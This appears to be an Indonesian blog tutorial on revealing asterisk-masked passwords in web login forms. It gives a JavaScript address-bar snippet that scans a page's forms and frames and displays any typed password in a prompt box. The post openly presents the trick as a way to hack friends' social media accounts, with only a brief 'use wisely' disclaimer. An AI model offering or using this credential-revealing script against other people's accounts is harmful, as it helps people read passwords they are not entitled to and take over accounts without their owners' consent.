Password Arterix biasanya muncul pada Facebook,Twitter,Gmail,Yahoo Mail, dan media sosial yang lainya. Tentu saja sobat tidak bisa mengetahui apa isi password yang seperti itu. Tapi jika sobat ingin mengetahuinya dan ingin meng-hack media sosial milik teman Sobat, Sobat bisa mengetahuinya di postingan Cara Melihat Password Arterix (Password Simbol Bintang) Menggunakan Javascript yang akan Sobat ketahui caranya dibawah ini :


  • Misal kita Login Pada Facebook atau apa saja yang bisa digunakan untuk menulis password
  • Kita ketikkan email dan password.
  • Untuk melihat password tersebut copy Javascript di bawah ini.
Code:
javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}



  • Paste code tersebut pada addressbar dan maka akan muncul kotak yang menunjukkan password yang tersembunyi pada Asterisk. lihat gambar dibawah ini:(terlihat pada kotak yang dilingkari menggunakan warna merah)
 

NOTE : Gunakan cara ini dengan bijak, dan tidak boleh asal-asalan.


Sekian Postingan tentang  Cara Melihat Password Arterix (Password Simbol Bintang) Menggunakan Javascript. Semoga bermanfaat bagi sobat semua, dan juga Terima Kasih telah mengunjungi blog yang sederhana ini.